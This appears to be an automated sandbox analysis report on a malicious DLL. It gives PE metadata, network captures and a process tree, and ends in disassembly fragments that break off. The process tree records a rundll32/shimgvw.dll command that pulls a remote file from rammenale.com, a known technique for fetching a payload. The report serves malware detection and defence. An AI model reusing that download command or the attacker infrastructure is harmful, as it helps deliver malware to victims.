                .rdata0x1b0000x7e1c0x80007a03ee635ac0944497a3adbe749e8266False0.459747314453125data5.284921655068188IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x230000x14980xc006d29a91b2c976a0089df0add158c8edcFalse0.15104166666666666data2.1650421272242983IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0x250000x1b00x2004cb59beff4c248d5e23bc9d579cd8ecfFalse0.501953125data4.493775023695173IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x260000x13280x140006243617089b09a6cfa72ee6ae3459c3False0.752734375data6.4254014515439986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_MANIFEST0x250600x14eXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminatorsEnglishUnited States0.6407185628742516

                Imports

                DLLImport
                ole32.dllCoCreateInstance, CoUninitialize, CoInitialize
                OLEAUT32.dllVariantClear, VariantInit, SysFreeString, SysAllocString
                KERNEL32.dllLoadLibraryExW, WriteConsoleW, SetEndOfFile, HeapReAlloc, HeapSize, CreateFileW, FlushFileBuffers, GetStringTypeW, SetStdHandle, GetProcessHeap, ExitProcess, ExpandEnvironmentStringsW, TerminateProcess, Sleep, CloseHandle, GetProcAddress, CreateProcessW, GetModuleHandleW, GetEnvironmentVariableW, LocalFree, GetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, FreeEnvironmentStringsW, RtlUnwind, RaiseException, InterlockedFlushSList, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, DecodePointer, ReadFile, MoveFileExW, GetModuleHandleExW, GetModuleFileNameW, SetFilePointerEx, GetConsoleMode, ReadConsoleW, GetStdHandle, GetFileType, HeapFree, HeapAlloc, LCMapStringW, WriteFile, GetConsoleOutputCP, GetFileSizeEx, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW

                Exports

                NameOrdinalAddress
                mydllmain10x1000101b

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 29, 2024 06:53:03.154005051 CEST49732443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:03.154042959 CEST44349732131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:03.154159069 CEST49732443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:03.181763887 CEST49733443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:03.181798935 CEST44349733131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:03.181888103 CEST49733443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:03.184397936 CEST49732443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:03.184413910 CEST44349732131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:03.191679955 CEST49733443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:03.191695929 CEST44349733131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:03.955569983 CEST49735443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:03.955595970 CEST44349735131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:03.955672979 CEST49735443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:03.964838982 CEST49735443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:03.964859009 CEST44349735131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.114339113 CEST44349732131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.114342928 CEST44349733131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.114413977 CEST49733443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.114417076 CEST49732443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.174293995 CEST49732443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.174308062 CEST44349732131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.174496889 CEST49733443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.174515963 CEST44349733131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.174596071 CEST44349732131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.174658060 CEST49732443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.174807072 CEST44349733131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.174966097 CEST49733443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.178992987 CEST49733443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.179011106 CEST49732443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.220504999 CEST44349733131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.220510006 CEST44349732131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.702300072 CEST44349733131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.702363014 CEST49733443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.702383041 CEST44349733131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.702433109 CEST49733443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.702439070 CEST44349733131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.702477932 CEST49733443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.702486992 CEST44349733131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.702497959 CEST44349733131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.702527046 CEST49733443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.702564955 CEST49733443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.703013897 CEST49733443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.703028917 CEST44349733131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.703039885 CEST49733443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.703077078 CEST49733443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.703458071 CEST44349732131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.703510046 CEST49732443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.703531027 CEST44349732131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.703583956 CEST49732443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.703596115 CEST44349732131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.703634977 CEST44349732131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.703659058 CEST49732443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.703682899 CEST49732443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.705193043 CEST49732443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.705208063 CEST44349732131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.705219030 CEST49732443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.705252886 CEST49732443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.876477003 CEST44349735131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.876564026 CEST49735443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.923494101 CEST49735443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.923508883 CEST44349735131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.923777103 CEST44349735131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:04.923844099 CEST49735443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.925523996 CEST49735443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:04.972507954 CEST44349735131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:05.468079090 CEST44349735131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:05.468182087 CEST49735443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:05.468202114 CEST44349735131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:05.468247890 CEST49735443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:05.468254089 CEST44349735131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:05.468264103 CEST44349735131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:05.468303919 CEST49735443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:05.468322039 CEST49735443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:05.468950987 CEST49735443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:05.468965054 CEST44349735131.153.206.231192.168.2.4
                Aug 29, 2024 06:53:05.468976021 CEST49735443192.168.2.4131.153.206.231
                Aug 29, 2024 06:53:05.469014883 CEST49735443192.168.2.4131.153.206.231

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 29, 2024 06:53:02.464329958 CEST5691553192.168.2.41.1.1.1
                Aug 29, 2024 06:53:03.145097017 CEST53569151.1.1.1192.168.2.4

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Aug 29, 2024 06:53:02.464329958 CEST192.168.2.41.1.1.10xbb8eStandard query (0)rammenale.comA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Aug 29, 2024 06:53:03.145097017 CEST1.1.1.1192.168.2.40xbb8eNo error (0)rammenale.com131.153.206.231A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • rammenale.com

                HTTPS Proxied Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.449733131.153.206.2314437440C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                2024-08-29 04:53:04 UTC287OUTGET /for2/zetaq.txt HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: rammenale.com
                Connection: Keep-Alive
                2024-08-29 04:53:04 UTC416INHTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 1251
                date: Thu, 29 Aug 2024 04:53:04 GMT
                server: LiteSpeed
                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                2024-08-29 04:53:04 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                2024-08-29 04:53:04 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.449732131.153.206.2314437432C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                2024-08-29 04:53:04 UTC287OUTGET /for2/zetaq.txt HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: rammenale.com
                Connection: Keep-Alive
                2024-08-29 04:53:04 UTC416INHTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 1251
                date: Thu, 29 Aug 2024 04:53:04 GMT
                server: LiteSpeed
                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                2024-08-29 04:53:04 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                2024-08-29 04:53:04 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.449735131.153.206.2314437716C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                2024-08-29 04:53:04 UTC287OUTGET /for2/zetaq.txt HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: rammenale.com
                Connection: Keep-Alive
                2024-08-29 04:53:05 UTC416INHTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 1251
                date: Thu, 29 Aug 2024 04:53:05 GMT
                server: LiteSpeed
                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                2024-08-29 04:53:05 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                2024-08-29 04:53:05 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:00:52:57
                Start date:29/08/2024
                Path:C:\Windows\System32\loaddll32.exe
                Wow64 process (32bit):true
                Commandline:loaddll32.exe "C:\Users\user\Desktop\UiFttnkl2R.dll"
                Imagebase:0x8b0000
                File size:126'464 bytes
                MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:1
                Start time:00:52:57
                Start date:29/08/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:2
                Start time:00:52:57
                Start date:29/08/2024
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\UiFttnkl2R.dll",#1
                Imagebase:0x240000
                File size:236'544 bytes
                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:3
                Start time:00:52:57
                Start date:29/08/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe C:\Users\user\Desktop\UiFttnkl2R.dll,mydllmain
                Imagebase:0x260000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:4
                Start time:00:52:57
                Start date:29/08/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\UiFttnkl2R.dll",#1
                Imagebase:0x260000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:5
                Start time:00:52:58
                Start date:29/08/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txt
                Imagebase:0x260000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                General

                Target ID:6
                Start time:00:52:58
                Start date:29/08/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txt
                Imagebase:0x260000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                General

                Target ID:8
                Start time:00:53:01
                Start date:29/08/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txt
                Imagebase:0x260000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:2.7%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:7.4%
                  Total number of Nodes:1996
                  Total number of Limit Nodes:21
                  execution_graph 15912 6cdfd5db 15915 6cdfd562 15912->15915 15916 6cdfd56e __FrameHandler3::FrameUnwindToState 15915->15916 15923 6ce015d1 EnterCriticalSection 15916->15923 15918 6cdfd5a6 15928 6cdfd5c4 15918->15928 15919 6cdfd578 15919->15918 15924 6ce03744 15919->15924 15923->15919 15925 6ce03752 _unexpected 15924->15925 15926 6ce0375f 15924->15926 15925->15926 15927 6ce03477 _unexpected 17 API calls 15925->15927 15926->15919 15927->15926 15931 6ce01619 LeaveCriticalSection 15928->15931 15930 6cdfd5b2 15931->15930 12604 6cdf30d9 12605 6cdf30e7 12604->12605 12606 6cdf30e2 12604->12606 12610 6cdf2fa3 12605->12610 12625 6cdf32bd 12606->12625 12611 6cdf2faf __FrameHandler3::FrameUnwindToState 12610->12611 12612 6cdf2fd8 dllmain_raw 12611->12612 12613 6cdf2fd3 12611->12613 12622 6cdf2fbe 12611->12622 12614 6cdf2ff2 dllmain_crt_dispatch 12612->12614 12612->12622 12629 6cdf1000 12613->12629 12614->12613 12614->12622 12617 6cdf3044 12618 6cdf304d dllmain_crt_dispatch 12617->12618 12617->12622 12620 6cdf3060 dllmain_raw 12618->12620 12618->12622 12619 6cdf1000 __DllMainCRTStartup@12 142 API calls 12621 6cdf302b 12619->12621 12620->12622 12634 6cdf2ef3 12621->12634 12624 6cdf3039 dllmain_raw 12624->12617 12626 6cdf32d3 12625->12626 12628 6cdf32dc 12626->12628 14340 6cdf3270 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 12626->14340 12628->12605 12630 6cdf100d 12629->12630 12631 6cdf1007 12629->12631 12663 6cdf2808 12630->12663 12631->12617 12631->12619 12635 6cdf2eff __FrameHandler3::FrameUnwindToState __DllMainCRTStartup@12 12634->12635 12636 6cdf2f9b 12635->12636 12637 6cdf2f30 12635->12637 12654 6cdf2f08 12635->12654 14127 6cdf3621 IsProcessorFeaturePresent 12636->14127 14102 6cdf3452 12637->14102 12640 6cdf2f35 14111 6cdf3314 12640->14111 12644 6cdf2fa2 __FrameHandler3::FrameUnwindToState 12646 6cdf2fd8 dllmain_raw 12644->12646 12647 6cdf2fd3 12644->12647 12660 6cdf2fbe 12644->12660 12645 6cdf2f3f __DllMainCRTStartup@12 14118 6cdf35f3 12645->14118 12648 6cdf2ff2 dllmain_crt_dispatch 12646->12648 12646->12660 12651 6cdf1000 __DllMainCRTStartup@12 142 API calls 12647->12651 12648->12647 12648->12660 12653 6cdf3013 12651->12653 12655 6cdf3044 12653->12655 12657 6cdf1000 __DllMainCRTStartup@12 142 API calls 12653->12657 12654->12624 12656 6cdf304d dllmain_crt_dispatch 12655->12656 12655->12660 12658 6cdf3060 dllmain_raw 12656->12658 12656->12660 12659 6cdf302b 12657->12659 12658->12660 12661 6cdf2ef3 __DllMainCRTStartup@12 161 API calls 12659->12661 12660->12624 12662 6cdf3039 dllmain_raw 12661->12662 12662->12655 12664 6cdf2833 __fread_nolock 12663->12664 12697 6cdf10ab 12664->12697 12666 6cdf284b __DllMainCRTStartup@12 12700 6cdf1024 12666->12700 12675 6cdf10ab __DllMainCRTStartup@12 59 API calls 12676 6cdf28dd __DllMainCRTStartup@12 12675->12676 12677 6cdf1024 __DllMainCRTStartup@12 58 API calls 12676->12677 12678 6cdf292d 12677->12678 12679 6cdfb786 ___std_exception_copy 17 API calls 12678->12679 12680 6cdf2933 12679->12680 12681 6cdf10ab __DllMainCRTStartup@12 59 API calls 12680->12681 12682 6cdf2946 __DllMainCRTStartup@12 12681->12682 12683 6cdf1024 __DllMainCRTStartup@12 58 API calls 12682->12683 12684 6cdf2991 12683->12684 12685 6cdfb786 ___std_exception_copy 17 API calls 12684->12685 12686 